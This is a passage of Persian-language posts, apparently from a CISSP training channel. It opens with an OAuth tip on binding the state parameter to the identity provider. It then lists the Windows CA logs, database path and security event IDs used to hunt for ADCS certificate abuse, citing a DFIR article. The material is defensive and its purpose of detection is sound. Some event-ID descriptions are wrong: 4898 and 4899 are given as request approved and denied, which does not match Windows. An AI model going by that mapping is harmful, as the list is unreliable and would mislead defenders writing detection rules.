۳. انجامBind کردن state به provider
در پارامتر state (که هنگام ساخت request OAuth استفاده می‌شود) حتماً identifierی از Provider هم قرار بدهید و در callback بررسی کنید که state مربوطه با Provider که callback زده مطابقت دارد.



#آکادمی_روزبه
مرکز تخصصی CISSP

آکادمی آموزش روزبه 📚

11 July 2025 11:39

چه لاگ‌هایی برای کشف حمله مندرج در لینک زیر لازم است :

جمع‌آوری لاگ‌های صدور گواهینامه (Certificate Enrollment) و هم مانیتورینگ رخدادهای مربوط به PKI (سرورهای CA) پایه‌ی Hunting و Detection در سناریوهای ADCS abuse به حساب می‌آید.
۱. لاگ‌های مورد نیاز در Windows CA:

این Event Log: سرورهای CA لاگ‌های مرتبط را در Event Viewer ثبت می‌کنند. مسیر:
✅️ Application and Services Logs > Microsoft > Windows > CertificateServicesClient-CertEnroll
✅️ Application and Services Logs > Microsoft > Windows > CertificateAuthority
فایل Database CA:
مسیر پیش‌فرض: C:\Windows\System32\CertLog\*.edb
برای جست‌وجوی درخواست‌ها به ابزار اختصاصی مثل “certutil” نیاز دارید.

۲. مهم‌ترین Eventهای مرتبط با صدور گواهی:

Event ID 4886: Certificate request submitted
Event ID 4887: Certificate issued
Event ID 4898: Certificate request approved
Event ID 4899: Certificate request denied
Event ID 1003: (CA Operation Audit)


#آکادمی_روزبه
مرکز تخصصی CISSP

https://dfir.ch/posts/tear_down_castle_part_one/#1-adcs-active-directory-certificate-services